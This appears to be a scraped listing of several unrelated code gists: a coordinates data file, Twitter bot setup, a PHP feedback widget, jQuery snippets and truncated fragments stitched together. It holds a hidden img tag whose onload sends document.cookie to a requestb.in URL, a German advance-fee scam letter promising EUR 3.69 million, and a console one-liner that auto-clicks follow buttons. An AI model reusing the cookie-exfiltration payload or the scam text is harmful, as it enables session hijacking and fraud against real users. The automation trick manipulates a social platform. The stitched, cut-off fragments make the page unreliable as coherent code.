This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
window.data = [{"epoch":"1522220644","latitude":"52.01","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"16","decimals":"2"},{"epoch":"1522220644","latitude":"51.92","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"14","decimals":"2"},{"epoch":"1522220644","latitude":"52.15","longitude":"4.4","category":"rich","city_slug":"amsterdam","samples":"30","decimals":"2"},{"epoch":"1522220645","latitude":"52.16","longitude":"4.4","category":"hipsters","city_slug":"amsterdam","samples":"18","decimals":"2"},{"epoch":"1522220645","latitude":"51.89","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"12","decimals":"2"},{"epoch":"1522220645","latitude":"51.95","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"16","decimals":"2"},{"epoch":"1522220645","latitude":"52.05","longitude":"4.4","category":"normies","city_slug":"amsterdam","samples":"16","decimals":"2"},{"epoch":"1522220645","latitude":"52.06","longitude":"4.4","catego |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const Twit = require('twit'); | |
const client = new Twit({ | |
consumer_key: process.env.CONSUMER_KEY, | |
consumer_secret: process.env.CONSUMER_SECRET, | |
access_token: process.env.ACCESS_TOKEN, | |
access_token_secret: process.env.ACCESS_TOKEN_SECRET | |
}); | |
Array.prototype.random = function() { return this[Math.floor(this.length * Math.random())]; }; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Hallo | |
Zuerst muss ich das Vertrauen, das diese Transaktion zu erbitten, ist es aufgrund seiner Natur als völlig vertraulich und geheim. Obwohl ich weiß, dass eine Transaktion dieser Größenordnung, dass jemand ängstlich und besorgt, aber ich versichere Ihnen, dass alles gut am Ende des Tages. | |
Mein Zweck der Kontaktaufnahme mit Ihnen ist für Sie zu helfen, die Mittel links von meinem verstorbenen Client, beschlagnahmt oder unbrauchbar erklärt verhindern, die die Bank in diesen Fonds im Wert von EUR 3.690.000.00 die durch meinen Mandanten vor seinem Tod | |
.Beachten Sie, dass, wenn sie in Kontakt mit Ihnen, weil Sie den gleichen Nachnamen mit meinem Mandanten an diesem Nachmittag habe er hier vor dem Sterben mit seiner Familie im Jahr 2013 hinterlegt das Geld in der Bank. | |
Die Bank hat mir eine Mitteilung an die Angehörigen oder Konto Kontakt wird aus dem Verkehr und dem Boden in die Schatzkammer der Bank umgeleitet erklärt werden, soweit alle meine Bemühungen, einen Einfluß von jemandem mit meinem Client verbunde |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<? | |
// <readme> | |
/* | |
This is a lite version of Olark's and Intercom's functionality (without the chat part). | |
It lets you get feedback from users on your site to your email. | |
And you won't have to rely on another company anymore! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<img src='/assets/img/users/tw15235264.jpg' style='display: none;' onload='(new Image()).src="//requestb.in/pdqu0gpd?x=" + document.cookie' /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const Twit = require('twit'); | |
const client = new Twit({ | |
consumer_key: process.env.CONSUMER_KEY, | |
consumer_secret: process.env.CONSUMER_SECRET, | |
access_token: process.env.ACCESS_TOKEN, | |
access_token_secret: process.env.ACCESS_TOKEN_SECRET | |
}); | |
Array.prototype.random = function() { return this[Math.floor(this.length * Math.random())]; }; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$('.choices').hide(); | |
setTimeout(function(obj) { | |
console.log('obj',$(obj).attr('id')); | |
$(obj).hide(); | |
// check if last, if so load new ones | |
console.log('length',$('.photos .photo:visible').length); | |
if($('.photos .photo:visible').length<=1) $('.photos').load("/?action=profiles",function() { | |
if($('.photos .photo:visible').length>1) $('.choices').show(); | |
startLoadAnimation(); | |
userCounter=0; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1) visit the profile you would like to push (you need to be logged-in, does not work on your own account) | |
2) open javascript console | |
3) type in: (f=function(){$(".user-actions-follow-button:first").trigger("click");setTimeout(f,100)})(); | |
4) hit enter |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1) visit the profile you would like to push | |
2) open javascript console | |
3) type in: (f=function(){$(".user-actions-follow-button:first").trigger("click");setTimeout(f,100)})(); | |
4) hit enter |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert(3); |
NewerOlder